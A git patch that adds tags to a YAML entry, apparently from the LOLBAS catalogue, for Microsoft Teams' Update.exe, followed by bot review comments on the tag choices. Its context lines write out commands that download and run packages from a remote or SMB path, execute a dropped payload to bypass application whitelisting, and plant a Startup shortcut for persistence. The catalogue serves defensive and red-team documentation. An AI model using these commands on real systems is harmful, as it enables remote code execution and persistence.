From 927189f01e9b38a4996092c77900837ef638b5b7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:35:45 +0200 Subject: [PATCH] Update Update.yml Tags Added Tags: Execute Nuget Execute Remote Execute EXE --- yml/OtherMSBinaries/Update.yml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index f4049a4..c0b51ae 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary 
@@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -46,6 +58,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -53,6 +68,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass @@ -60,6 +78,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary 
@@ -67,6 +88,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -74,6 +98,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary @@ -81,6 +108,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary @@ -88,6 +117,8 @@ Commands: Privileges: User MitreID: T1547 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --removeShortcut=payload.exe -l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary 
@@ -95,6 +126,8 @@ Commands: Privileges: User MitreID: T1070 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe' Code_Sample:
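Review bot: In the first hunk (@@ -18,6 +18,9 @@) `Execute: Nuget` is introduced as a tag value and is then repeated on nine entries; before merging, confirm it is an accepted value in the repository's tag vocabulary (and passes whatever YAML validation the project runs), since every hunk that adds `- Execute: Nuget` would need the same correction if it is not.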
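Review bot: The hunk at @@ -60,6 +78,9 @@ tags the wrong entry: the trailing context of the previous hunk shows that the block ending at line 60 is `Update.exe --processStart payload.exe --process-start-args "whatever args"` (Usecase: Application Whitelisting Bypass), which executes a file already copied into the Teams directory, so `- Execute: Nuget` and `- Execute: Remote` do not describe it, and the same command is tagged `- Execute: EXE` at @@ -81,6 +108,8 @@. Suggest replacing the two added tag lines in that hunk with `- Execute: EXE` so both `--processStart` entries carry the same tag.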
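Review bot: The last hunk (@@ -95,6 +126,8 @@) adds `- Execute: EXE` to the `--removeShortcut=payload.exe -l=Startup` entry, whose leading context carries MitreID T1070 and whose description says it only removes the Startup shortcut created earlier; nothing is executed, so an `Execute:` tag misrepresents what defenders would expect to see from this command. Suggest dropping the tag here, or using a value that reflects indicator removal if the tag vocabulary has one, and leaving `Execute: EXE` on the `--createShortcut` entry, where the description does say the payload runs at every login.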